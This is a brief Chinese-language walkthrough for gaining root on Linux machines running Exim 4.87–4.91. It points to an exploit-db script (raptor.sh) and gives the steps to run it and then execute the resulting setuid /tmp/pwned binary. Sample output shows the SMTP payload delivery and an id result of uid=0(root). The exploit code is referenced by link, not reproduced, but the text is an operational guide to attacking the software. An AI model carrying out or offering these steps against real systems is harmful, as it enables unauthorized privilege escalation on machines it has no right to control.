Cr.Exim 4.87 - 4.91 - 本地权限提升
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.此方法要求您首先以标准用户权限访问目标机器。
#2.一旦您访问了目标机器,请创建一个包含以下内容的脚本文件:
vi raptor.sh
#3.从提供的 'raptor.sh' 文件中复制代码。然后,使用以下命令执行该文件:
chmod +x raptor.sh
./raptor.sh
#4.您应收到类似以下示例的输出:
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.接下来,执行以下命令:
/tmp/pwned
#6.然后,尝试运行 'id' 命令。如果您看到以下结果:
uid=0(root) gid=0(root) groups=0(root),1001(noob)